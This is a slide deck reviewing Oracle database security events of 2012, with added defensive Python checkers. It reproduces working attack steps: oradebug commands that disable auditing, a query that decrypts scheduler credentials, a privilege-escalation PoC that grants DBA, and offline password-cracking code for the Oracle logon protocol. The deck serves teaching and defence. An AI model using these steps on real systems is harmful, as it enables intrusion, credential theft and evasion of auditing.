Best of Oracle Security 2012 - Red-Database-Security
What happened in 2012
Agenda
! Recapitulation 2011
! January 2012 - October 2012
! Q&A
Recapitulation 2011
Oradebug
! Undocumented function in Oracle
! Details published in 2011 (Hacktivity 2011*)
! Allows to run OS commands
! Allows to disable normal and SYS auditing
! Can't be audited
! Platform-independent solution without poke added
* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf
UNFIXED
Disable Oracle Auditing
SQL> oradebug setmypid
Statement processed.
SQL> oradebug setvar sga kzaflg_ 0
BEFORE: [1492F4EC0, 1492F4EC4) = 00000001
AFTER:  [1492F4EC0, 1492F4EC4) = 00000000
2012 - The Good, The Bad, The Ugly
The good
Lowest number of vulnerabilities in Oracle database ever
! Only 17 findings in 2012 (2011: 29, 2010: 31)
! More (8) remotely exploitable bugs (2011: 5)
• January 2012 CPU (2 vulnerabilities – 1 remote)
• April 2012 CPU (6 vulnerabilities – 3 remote)
• July 2012 CPU (4 vulnerabilities – 3 remote)
• October 2012 CPU (5 vulnerabilities – 1 remote)
The bad
Critical bugs are not fixed (only workarounds)
! SCN bug was not fixed
! TNS Poisoning was not fixed
! Stealth Password Cracking was not fixed
The ugly
Oracle Corporation
! Really bad communication skills (TNS poisoning)
! Unwilling to fix problems (TNS poisoning, stealth password cracking)
! The customer is blamed for issues not being fixed: "Customers have requested that Oracle not include such security fixes into Critical Patch Updates ..."
2012
January 2012
• Oracle CPU January 2012 *
• Problem with large Sequence Change Numbers (SCN) **
* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0
January 2012 CPU*
• 2 security fixes (1 remotely exploitable)
• Core RDBMS
• TNS Listener
SCN Problem
! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.
! Due to a problem in the backup the SCN increases dramatically
! The undocumented parameter _minimum_giga_scn allows the SCN to be set to a chosen value
! The backup bug and the undocumented parameter were fixed/removed via the January 2012 CPU.
* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html
UNFIXED
SCN propagation (diagram): DB1 (SCN: 10 Mio) and DB2 (SCN: 2 Mio) are connected via a database link. Compare 10 Mio vs. 2 Mio and take the highest number. An undocumented Oracle parameter or the backup bug is dramatically increasing the SCN.
Use the undocumented parameter, set the time of the attacker database to a point in the future and use a huge SCN.
Attack (diagram): the attacker database (SCN: huge SCN) connects to DB2 via a database link; DB2 takes over the huge SCN. DB crash after a while.
February 2012
• Get DBMS_SCHEDULER.CREATE_CREDENTIAL cleartext password *
• DBMS_SCHEDULER opens a port 4444 if undocumented parameters are used **
* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html
** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html
Feature
Decrypt Oracle Scheduler Credentials

exec DBMS_SCHEDULER.CREATE_CREDENTIAL(credential_name => 'local_credential', username => 'oracle', password => 'welcome1');

select o.object_name credential_name, username, password
  FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o
 WHERE c.obj# = o.object_id;

CREDENTIAL_NAME    USERNAME PASSWORD
------------------ -------- ------------------------------------
LOCAL_CREDENTIAL   oracle   BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==
LOCAL_CREDENTIAL2  oracle2  BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==

SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME,
       DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwd
  FROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ U
 WHERE U.USER# = O.OWNER# AND C.OBJ# = O.OBJ#;

CREDENTIAL_OWNER CREDENTIAL_NAME      USERNAME PWD
---------------- -------------------- -------- --------
SYS              LOCAL_CREDENTIAL     oracle   welcome1
SYS              LOCAL_CREDENTIAL2    oracle2  welcome1
Scheduler Credentials
"...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcher
bitand( ,131072) starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444
I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?..."
Due to undocumented functionality, DBMS_SCHEDULER listens on port 4444 if a special parameter is used.
March 2012
• Disabling Oracle triggers on a per-session basis *
• Self-Defending Databases **
* http://www.pythian.com/news/30781/disabling-triggers-per-session/
** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
Disable Oracle Triggers for a session
SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true);
PL/SQL procedure successfully completed.
Disable all triggers for a session. This could be used to bypass shadow/history table architectures.
Feature
Self-defending Databases
• Nearly every SQL injection abused from the web creates errors in the database
• A typical attack takes less than 2 minutes to download data
• 2 minutes are too short for humans to react
• But the database itself is able to detect this kind of attack by looking at the specific error messages created by the SQL injection attack
• After detection the appropriate countermeasures can be taken.
Detection of SQL Injection Attacks (from the web)
• Depending on the attack method used (UNION, extending the query, creating error messages to retrieve data, …) a specific error will be created, e.g.
ORA-01789: query block has incorrect number of result columns
• Or
Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'mypassword' to a column of data type int. /Administrator/login.asp, line 27
Detection of SQL Injection Attacks (from the web)
Out of the box, databases like Oracle or Microsoft SQL Server are able to detect SQL-specific error messages and can run (custom) code (= countermeasure) after the detection.
These specific database errors only occur if a vulnerability exists and this vulnerability was triggered by a specific string (e.g. "or 1=1--").
False positives are rare. A false positive could occur if developers deploy applications with an incorrect SQL statement (e.g. a missing single quote).
SQL Injection Error Codes Oracle - I

| Error code | Error Message | Typical Command |
|---|---|---|
| ORA-00900 | invalid SQL statement | |
| ORA-00906 | missing left parenthesis | |
| ORA-00907 | missing right parenthesis | |
| ORA-00911 | invalid character | e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote |
| ORA-00917 | missing comma | |
| ORA-00920 | invalid relational operator | |
| ORA-00923 | FROM keyword not found where expected | |
| ORA-00933 | SQL command not properly terminated | |
| ORA-00970 | missing WITH keyword | |
| ORA-01031 | insufficient privileges | Attempted privilege escalation |
| ORA-01476 | divisor is equal to zero | Blind SQL injection attempt (e.g. sqlmap) |
| ORA-01719 | outer join operator not allowed in operand of OR or IN | |
| ORA-01722 | invalid number | Enumeration with rownum and current rownum does not exist |
SQL Injection Error Codes Oracle - II

| Error code | Error Message | Typical Command |
|---|---|---|
| ORA-01742 | comment not properly terminated | inline comment, e.g. optimizer hint is not properly terminated |
| ORA-01756 | quoted string not properly terminated | single quote not properly terminated |
| ORA-01789 | query block has incorrect number of result columns | Attempt to use UNION SELECT |
| ORA-01790 | expression must have same datatype as corresponding expression | Attempt to use UNION SELECT |
| ORA-24247 | network access denied by access control list | Oracle ACL has blocked the usage of UTL_INADDR (or similar) |
| ORA-29257 | host %s unknown | Attempted SQL injection via utl_inaddr |
| ORA-29540 | class does not exist | Attempted utl_inaddr attempt but Java is not installed |
| ORA-31011 | XML parsing failed | SQL injection attempt via xmltype |
| ORA-19202 | Error occurred in XML processing | SQL injection via extractvalue |
CREATE OR REPLACE TRIGGER after_error
AFTER SERVERERROR ON DATABASE
DECLARE
  sql_text  ORA_NAME_LIST_T;
  v_stmt    CLOB;          -- SQL statement causing the problem
  n         NUMBER;        -- number of chunks for constructing the SQL statement causing the error
  v_program VARCHAR2(64);
  v_serial  NUMBER;
  v_sid     NUMBER;
BEGIN
  -- Version 1.00
  SELECT program, serial#, sid
    INTO v_program, v_serial, v_sid
    FROM v$session
   WHERE sid = sys_context('USERENV', 'SID');

  -- construct the SQL text from its chunks
  n := ora_sql_txt(sql_text);
  IF n >= 1 THEN
    FOR i IN 1..n LOOP
      v_stmt := v_stmt || sql_text(i);
    END LOOP;
  END IF;

  -- walk the error stack of this server error
  FOR j IN 1..ora_server_error_depth LOOP
    IF (lower(v_program) = 'iis.exe')  -- add your own application server
       AND (ora_server_error(j) IN (942, 900, 906, 907, 911, 917, 920, 923, 933, 970,
                                    1031, 1476, 1719, 1722, 1742, 1756, 1789, 1790,
                                    19202, 24247, 29257, 29540, 31011))
    THEN
      -- Potential attack was detected
      -- 1. Monitor the attack
      -- 2. Send an email to the responsible person (DBA/MoD)
      --    send_email (e.g. via utl_smtp)
      -- 3. Lock the database user used by the webapp
      EXECUTE IMMEDIATE 'ALTER USER /* Error_Trigger */ "'
                        || sys_context('USERENV', 'SESSION_USER') || '" ACCOUNT LOCK';
      -- 4. Terminate the session (ALTER SYSTEM KILL SESSION 'sid,serial#')
      EXECUTE IMMEDIATE 'ALTER SYSTEM /* Error_Trigger */ KILL SESSION '''
                        || v_sid || ',' || v_serial || '''';
      -- 5. Other countermeasures
    END IF;
  END LOOP;
END after_error;
/
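The decision the SERVERERROR trigger above makes (is this error code an injection indicator, and does it come from the web application's session?) can be exercised offline before it is deployed as a trigger. The following Python is an added example, not code from the slides or from Red-Database-Security: it carries the error codes from the two tables, applies the same program filter the trigger uses (`iis.exe`), and builds the same two countermeasure statements as text instead of executing them. The event field names, the sample events and the `APP_SERVER_PROGRAMS` set are assumptions constructed for the example.

```python
from dataclasses import dataclass
from typing import List

# Error codes from the two "SQL Injection Error Codes Oracle" tables above.
SQLI_ERROR_CODES = {
    900: "invalid SQL statement",
    906: "missing left parenthesis",
    907: "missing right parenthesis",
    911: "invalid character",
    917: "missing comma",
    920: "invalid relational operator",
    923: "FROM keyword not found where expected",
    933: "SQL command not properly terminated",
    970: "missing WITH keyword",
    1031: "insufficient privileges",
    1476: "divisor is equal to zero",
    1719: "outer join operator not allowed in operand of OR or IN",
    1722: "invalid number",
    1742: "comment not properly terminated",
    1756: "quoted string not properly terminated",
    1789: "query block has incorrect number of result columns",
    1790: "expression must have same datatype as corresponding expression",
    19202: "Error occurred in XML processing",
    24247: "network access denied by access control list",
    29257: "host unknown",
    29540: "class does not exist",
    31011: "XML parsing failed",
}

# The trigger only reacts when the failing session belongs to the web
# application server ('iis.exe' on the slides). Errors from any other client
# are treated as the rare false positive the slides mention (a developer
# deploying broken SQL). Assumption: extend with your own server names.
APP_SERVER_PROGRAMS = {"iis.exe"}


@dataclass
class ServerError:
    """One SERVERERROR event; the field names are an assumption for this example."""
    program: str        # v$session.program of the failing session
    error_code: int     # ora_server_error(n)
    session_user: str   # sys_context('USERENV', 'SESSION_USER')
    sid: int
    serial: int
    sql_text: str       # ora_sql_txt chunks joined together


def classify(ev: ServerError) -> str:
    """'attack': react; 'app-error': likely a developer mistake, only log it;
    'ignore': the error code is not an injection indicator at all."""
    if ev.error_code not in SQLI_ERROR_CODES:
        return "ignore"
    if ev.program.lower() not in APP_SERVER_PROGRAMS:
        return "app-error"
    return "attack"


def countermeasures(ev: ServerError) -> List[str]:
    """Steps 3 and 4 of the trigger, built the same way but returned as text."""
    if classify(ev) != "attack":
        return []
    return [
        f'ALTER USER /* Error_Trigger */ "{ev.session_user}" ACCOUNT LOCK',
        f"ALTER SYSTEM /* Error_Trigger */ KILL SESSION '{ev.sid},{ev.serial}'",
    ]


def triage(events: List[ServerError]) -> List[str]:
    """Classification per event, in input order."""
    return [classify(ev) for ev in events]


# Constructed sample events (not real captures).
SAMPLE_EVENTS = [
    # UNION with the wrong column count from the web application's session
    ServerError("iis.exe", 1789, "WEBAPP", 133, 4711,
                "select name from products where id=1 union select 1"),
    # a developer's interactive session with a missing parenthesis
    ServerError("sqlplus.exe", 907, "DEVELOPER", 140, 12,
                "select * from products where (id=1"),
    # ORA-01403 (no data found) from the web application: not an indicator
    ServerError("iis.exe", 1403, "WEBAPP", 133, 4711,
                "select name from products where id=99"),
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"ORA-{ev.error_code:05d} from {ev.program}: {verdict}")
        for stmt in countermeasures(ev):
            print("   ", stmt)
```

Running the classifier over a day of real SERVERERROR events before installing the trigger shows how often the `app-error` branch fires in your environment; if it fires often for the application server itself, the lock-and-kill reaction in the trigger will hit your own users as well.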
April 2012
• Oracle CPU April 2012 *
• TNS Poisoning **
• Critical MySQL Bug published ***
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
** http://seclists.org/fulldisclosure/2012/Apr/343
*** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
April 2012 CPU*
• 6 security fixes (3 remotely exploitable)
• Core RDBMS
• OCI
• Enterprise Manager
* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
TNS Poisoning
• Reported by Joxean Koret to Oracle in 2008*
• Everyone with access to the listener can redirect any network traffic by registering a second listener.
• Affects all versions of Oracle (8i-11g R2)
• Due to a communication problem ("was fixed in a future version") the finder of this bug released an advisory including proof-of-concept code (for SIDs with 6 characters).
• To implement a workaround Oracle even changed the license agreement for RAC (inclusion of Advanced Security Option ASO) to be able to protect RAC.
UNFIXED
* http://seclists.org/fulldisclosure/2012/Apr/204
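Since the bug itself stays unfixed, the defender's check is whether a listener still accepts service registration from arbitrary network clients. The following Python is an added example, not code from the slides or from Red-Database-Security: it reads a listener.ora and reports whether dynamic registration is open, restricted or disabled, based on the listener.ora parameters Oracle published as workarounds (SECURE_REGISTER_<listener>, DYNAMIC_REGISTRATION_<listener>, VALID_NODE_CHECKING_REGISTRATION_<listener>). Which of these a given Oracle release honours is version dependent and is not checked here (assumption); the two sample listener.ora contents are constructed, a weak one beside a hardened one.

```python
import re
from typing import Optional

# listener.ora parameter families Oracle documented as workarounds against
# TNS poisoning (service registration by unauthenticated remote clients).
SECURE_REGISTER = "SECURE_REGISTER_{}"
DYNAMIC_REGISTRATION = "DYNAMIC_REGISTRATION_{}"
VALID_NODE_CHECKING = "VALID_NODE_CHECKING_REGISTRATION_{}"

# Constructed sample listener.ora files (not taken from any real system).
WEAK_LISTENER_ORA = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db1.example.invalid)(PORT = 1521))
    )
  )
"""

HARDENED_LISTENER_ORA = WEAK_LISTENER_ORA + """
# Only local IPC clients may register services with this listener.
SECURE_REGISTER_LISTENER = (IPC)
"""


def parameter(text: str, name: str) -> Optional[str]:
    """Value of a top-level `NAME = value` line in listener.ora (case-insensitive),
    or None when the parameter is not set at all."""
    m = re.search(rf"^\s*{re.escape(name)}\s*=\s*(.+?)\s*$", text,
                  re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def registration_policy(text: str, listener: str = "LISTENER") -> str:
    """'disabled', 'restricted' or 'open' for dynamic service registration."""
    dyn = parameter(text, DYNAMIC_REGISTRATION.format(listener))
    if dyn and dyn.strip("() ").upper() == "OFF":
        return "disabled"          # no dynamic registration at all
    vnc = parameter(text, VALID_NODE_CHECKING.format(listener))
    if vnc and vnc.strip("() ").upper() in {"ON", "LOCAL", "SUBNET"}:
        return "restricted"        # registration limited to known nodes
    sec = parameter(text, SECURE_REGISTER.format(listener))
    if sec is not None:
        protocols = {p.strip().upper() for p in sec.strip("() ").split(",")}
        # Registration over plain TCP is what a remote attacker needs; IPC
        # (and TCPS with client authentication) keep such clients out.
        if "TCP" not in protocols:
            return "restricted"
    return "open"                  # anyone reaching the port may register


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_LISTENER_ORA), ("hardened", HARDENED_LISTENER_ORA)):
        print(f"{label}: registration is {registration_policy(cfg)}")
```

For a RAC installation the remote listeners cannot simply be limited to IPC, which is why the slides mention the ASO-based workaround; on a single-instance database the `(IPC)` setting shown in the hardened sample is the cheapest check to run across all listener.ora files you own.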
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
Attacker is now manin the middle (MITM)
![Page 63: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/63.jpg)
Attacker Listener
Victim
Logon
Redirect Network Traffic of the victim
Forward to the database again
![Page 64: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/64.jpg)
Attacker ListenerRedirect Network Traffic of the victim
Forward to the database again
![Page 65: Best of Oracle Security 2012 - Red-Database-Security · Oradebug! Undocumented function in Oracle! Details published in 2011 (Hacktivity 2011*)! Allows to run OS commands! Allows](https://reader031.fdocuments.us/reader031/viewer/2022022022/5ba32ba809d3f2d14d8d7b20/html5/thumbnails/65.jpg)
TNS Poisoning - Statements Oracle*
• Oracle: "The fix is very complex and it is extremely risky to backport."
• Oracle: "This fix is in a sensitive part of our code where regressions are a concern."
• Oracle: "Customers have requested that Oracle not include such security fixes into Critical Patch Updates that increases the chance of regressions."
• Oracle: "To protect the interest of our customers, we do not provide these level of details (like versions affected) for the issues that are addressed as in-depth. The future releases will have the fix."
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Statement Researcher*
• Joxean: "So, as previously stated, this is a 0day vulnerability with no patch, Oracle refuses to patch the vulnerability in *any* existing version and Oracle refuses to give details about which versions will have the fix. But they say the vulnerability is fixed. Cool."
* http://seclists.org/fulldisclosure/2012/Apr/343
TNS Poisoning - Workarounds
• There are different workarounds available (COSTS parameter, dynamic registration, restricted_nodes)
• There are 2 documents for non-RAC and RAC systems available in Oracle MyOracleSupport (1453883.1, 1340831.1) describing the workarounds
• Testing is necessary to avoid side-effects (e.g. Grid Control, IP restriction in sqlnet.ora & IPC)
• set dynamic_registration=off
MySQL - Password Problem*,**
! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?" "How about now?" "Now?"
! Pwnie for Best Server-Side Bug
! Free Scanner/Script to abuse this vulnerability available **
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122
** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
*** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow
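Why "asking again" works, as an added illustration that is not part of the slides: in the affected MySQL builds check_scramble() handed the int result of memcmp() back through a my_bool (a char), so whenever the C library's memcmp returns a difference outside -128..127 (optimised builds do), the truncated value is 0 and a wrong password is accepted, about once in 256 tries. The memcmp stand-in, the sample scramble values and the seed below are constructed for the demo; the fixed variant shows the comparison done with an explicit boolean result.

```python
import hmac
import random

SCRAMBLE_LEN = 20  # size of the SHA-1 hash_stage2 buffers check_scramble() compares


def memcmp_like(a: bytes, b: bytes, rng: random.Random) -> int:
    """Constructed stand-in for an optimised libc memcmp.

    C only promises the sign of the result: 0 on equality, otherwise any
    nonzero int. Vectorised implementations return differences far outside
    the -128..127 range that a char can hold, which is what this models."""
    if a == b:
        return 0
    return rng.choice((-1, 1)) * rng.randint(1, 1 << 20)


def as_my_bool(value: int) -> int:
    """The implicit int -> my_bool (signed char) conversion of the buggy return."""
    return ((value + 128) % 256) - 128


def check_scramble_vulnerable(stage2: bytes, reassured: bytes, rng: random.Random) -> bool:
    """Mirrors `my_bool check_scramble(...) { return memcmp(...); }` plus a caller
    that treats 0 as "password correct". Returns True when the login is accepted."""
    return as_my_bool(memcmp_like(stage2, reassured, rng)) == 0


def check_scramble_fixed(stage2: bytes, reassured: bytes) -> bool:
    """Hardened form: a constant-time comparison whose result is a real boolean,
    so no information is lost between the compare and the accept/reject decision."""
    return hmac.compare_digest(stage2, reassured)


def bypass_rate(attempts: int, seed: int = 2012) -> float:
    """Fraction of wrong-password attempts the vulnerable check accepts.

    Every multiple of 256 truncates to 0, so the expected rate is 1/256 (~0.0039):
    a client that simply retries will get in after a few hundred attempts."""
    rng = random.Random(seed)
    correct = bytes(range(SCRAMBLE_LEN))  # constructed hash_stage2 of the real password
    wrong = bytes(SCRAMBLE_LEN)           # constructed value a wrong password produces
    accepted = sum(check_scramble_vulnerable(correct, wrong, rng) for _ in range(attempts))
    return accepted / attempts


if __name__ == "__main__":
    print("vulnerable check accepts a wrong password in %.2f%% of attempts"
          % (100 * bypass_rate(50000)))
    print("fixed check accepts a wrong password:",
          check_scramble_fixed(bytes(range(SCRAMBLE_LEN)), bytes(SCRAMBLE_LEN)))
```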
May 2012
• nothing special happened
June 2012
• nothing special happened
July 2012
• Oracle CPU July 2012*
* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html
July 2012 CPU*
• 4 security fixes (3 remotely exploitable)
  • Core RDBMS
  • Enterprise Manager
  • Network Layer
• Hidden security bug in Oracle Text (BlackHat 0day) was fixed without being mentioned.
• Fixing security bugs without documenting them is a common Oracle practice.
August 2012
• 0day privilege escalation exploit (CVE-2012-3132) for Oracle 11g released at BlackHat 2012 Las Vegas*
• Out-of-band patch for Oracle**
("Oracle Database Server versions 11.2.0.2 and 11.2.0.3 do not require patching if the July 2012 Critical Patch Update has been applied.")
* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/
** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html
Proof-of-concept released at BlackHat 2012 (CVE-2012-3132, slides 78-79):

```sql
connect blackhat/password
set role dba; -- throws an error
create or replace function X return varchar authid current_user is
pragma autonomous_transaction;
begin
  execute immediate 'GRANT DBA TO BLACKHAT';
  commit;
  return 'FOO';
END;
/
grant execute on X to public;
create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);
create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;
exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);
drop table pwnoracle;
set role dba;
```
September 2012
• Stealth Password Cracking exploit released
• Cleartext passwords at OCI client side
• Metasploit/Meterpreter modules for
  • TNS Poisoning
  • Get cleartext passwords clientside
  • Get cleartext passwords serverside
  • Run OS commands (via oradebug)
• Side channel attack on ORA-00942
Stealth Password Cracking
! Flaw in the Oracle Logon Protocol (CVE-2012-3137)*
! Esteban Fayó found this issue 1 year ago and gave a talk "Cryptographic flaws in Oracle Database authentication protocol" at the Ekoparty because Oracle was unwilling to fix this issue
! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts
! Incomplete logon is not audited
! Oracle did not fix this problem. They removed the OLogon 11 protocol once the October 2012 CPU is applied and recommend using the old DES hashes.
==> this could cause compatibility problems with clients < 11.2.0.3
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
UNFIXED
Stealth Password Cracking I (diagram, slides 83-99)
1.) Attacker: Logon: SYSTEM
2.) Database: Get hash and salt of user SYSTEM (USER$.SPARE4)
3.) Database: Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08
4.) Database: Send salt + encrypted session key
5.) Attacker: Stop logon process (no PW sent -> not an invalid login attempt)
6.) Attacker: Generate password hash (e.g. SHA1(manager||salt))
7.) Attacker: Decrypt (AES) the encrypted session key with the hash generated in 6.)
8.) Attacker: Check if the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08
9.) Attacker: If true then password found, else try a new password
Stealth Password Cracking II
! Attacker sends a username (e.g. SYSTEM) without a password to the database
! The database reads the password hash of the user SYSTEM
! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08
! The result is encrypted (AES) with the password salt of the user
! The encrypted session key + the salt is sent to the attacker
! Attacker stops the login process
* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137
Stealth Password Cracking III
! Attacker now generates SHA1 hashes for common passwords using the salt received from the database
! This hash is used to decrypt the received session key
! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known
Pseudo-Code
! users.txt (list of common users)
  dict.txt (common passwords)
!
```
for all entries in users.txt do
    result := send_logon_packet(USERNAME)
    if result contains a salt then          -- we found a valid user
        for all passwords in dict.txt do
            hash   := sha1(password || salt)
            decres := decrypt_aes(session_key, hash)
            if decres contains \x08\x08\x08\x08 then
                print "password found"
            fi
        od
    fi
od
```
! Thousands of (local) tests could be done in a second. Only 1 network packet per username
```python
import hashlib
from Crypto.Cipher import AES  # PyCrypto or PyCryptodome


def decrypt(session, salt, password):
    # O5LOGON V11: key = SHA1(password || salt) padded with 4 zero bytes (AES-192),
    # CBC mode with an all-zero IV (PyCrypto's implicit default, written out here)
    pass_hash = hashlib.sha1(password + salt)
    key = pass_hash.digest() + b'\x00\x00\x00\x00'
    decryptor = AES.new(key, AES.MODE_CBC, b'\x00' * 16)
    plain = decryptor.decrypt(session)
    return plain


# encrypted session key and salt taken from the server's logon response (hex)
session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'
salt_hex = 'A7193E546377EC56639E'
passwords = ['test', 'password', 'oracle', 'demo']

for password in passwords:
    session_id = decrypt(bytes.fromhex(session_hex), bytes.fromhex(salt_hex), password.encode())
    print('Decrypted session_id for password "%s" is %s' % (password, session_id.hex()))
    # the last 8 bytes are the \x08 padding when the guessed password was right
    if session_id[40:] == b'\x08' * 8:
        print('PASSWORD IS "%s"' % password)
        break
```
Stealth Password Cracking II
! Tools already exist (John the Ripper)
! Up to 1 million password tests per second
Mitigation of the problem
! (No patch) Switch back to the old DES password hashes by using the parameter SEC_CASE_SENSITIVE_LOGON=FALSE
! The Oracle October 2012 CPU removes the vulnerable protocol and automatically switches back to OLogon V10
! Set sqlnet.allowed_logon_version=12 to use OLogon protocol V12. This requires an 11.2.0.3 client
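A small checker for the two parameters the slide names, added here as an example (not from the talk): it parses sqlnet.ora and init.ora style text and reports whether the flawed V11 logon exchange can still be negotiated. The sample files are constructed; treating an absent SQLNET.ALLOWED_LOGON_VERSION as 8 (the 11.2 default) and "12a" as 12 are assumptions from Oracle's documentation, and the patch level (October 2012 CPU) cannot be read from these files, so it is out of scope.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Oracle *.ora parameter files use "KEY = value" lines; '#' starts a comment.
_KV_RE = re.compile(r"^([A-Za-z0-9_.]+)\s*=\s*(.*?)\s*$")


def parse_ora(text: str) -> Dict[str, str]:
    """Parse flat KEY = value lines into an upper-cased dict.

    Multi-line nested (ADDRESS=...) entries as found in listener.ora are not
    handled; this example only needs the two flat parameters below."""
    params: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = _KV_RE.match(line)
        if m:
            params[m.group(1).upper()] = m.group(2).strip("'\"").upper()
    return params


@dataclass
class LogonAssessment:
    v11_possible: bool       # can the flawed O5LOGON V11 exchange still be negotiated?
    des_hashes_forced: bool  # SEC_CASE_SENSITIVE_LOGON=FALSE workaround in effect?
    findings: List[str] = field(default_factory=list)


def min_logon_version(sqlnet: Dict[str, str]) -> int:
    """SQLNET.ALLOWED_LOGON_VERSION as an int. Absent -> 8 (assumed 11.2 default);
    the 12c spelling '12a' is treated as 12."""
    raw = sqlnet.get("SQLNET.ALLOWED_LOGON_VERSION", "8")
    m = re.match(r"(\d+)", raw)
    return int(m.group(1)) if m else 8


def assess_logon_protocol(sqlnet_text: str, init_text: str) -> LogonAssessment:
    sqlnet = parse_ora(sqlnet_text)
    init = parse_ora(init_text)
    result = LogonAssessment(v11_possible=True, des_hashes_forced=False)

    # Slide mitigation: sqlnet.allowed_logon_version=12 forces the V12 protocol.
    # Anything lower still lets a client negotiate the V11 exchange that hands out
    # the AES-encrypted, 0x08-padded session key without an audited failed login.
    ver = min_logon_version(sqlnet)
    if ver >= 12:
        result.v11_possible = False
        result.findings.append("OK: SQLNET.ALLOWED_LOGON_VERSION=%d, V11 logon disabled "
                               "(needs 11.2.0.3 or newer clients)" % ver)
    else:
        result.findings.append("WEAK: SQLNET.ALLOWED_LOGON_VERSION=%d still permits "
                               "the V11 logon protocol" % ver)

    # Slide mitigation (no patch): SEC_CASE_SENSITIVE_LOGON=FALSE switches the server
    # back to the old DES verifiers, so the V11 exchange is no longer used, at the
    # price of case-insensitive passwords and a weak hash.
    if init.get("SEC_CASE_SENSITIVE_LOGON", "TRUE") == "FALSE":
        result.des_hashes_forced = True
        result.v11_possible = False
        result.findings.append("NOTE: SEC_CASE_SENSITIVE_LOGON=FALSE, server falls back "
                               "to DES hashes")
    return result


# Constructed sample configuration files for the demo.
SQLNET_DEFAULT = "# sqlnet.ora with nothing relevant set\nSQLNET.AUTHENTICATION_SERVICES = (NTS)\n"
SQLNET_HARDENED = "SQLNET.ALLOWED_LOGON_VERSION = 12   # V12 only\n"
INIT_DEFAULT = "SEC_CASE_SENSITIVE_LOGON = TRUE\n"
INIT_WORKAROUND = "sec_case_sensitive_logon = FALSE\n"

if __name__ == "__main__":
    for label, sq, ini in (("default", SQLNET_DEFAULT, INIT_DEFAULT),
                           ("hardened", SQLNET_HARDENED, INIT_DEFAULT),
                           ("workaround", SQLNET_DEFAULT, INIT_WORKAROUND)):
        r = assess_logon_protocol(sq, ini)
        print("%-10s V11 possible: %-5s | %s" % (label, r.v11_possible, "; ".join(r.findings)))
```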
DerbyCon / Hacktivity presentation of László Tóth and Ferenc Spala*
! Presentation about database security without SQL injection
! New flaw in the OCI driver
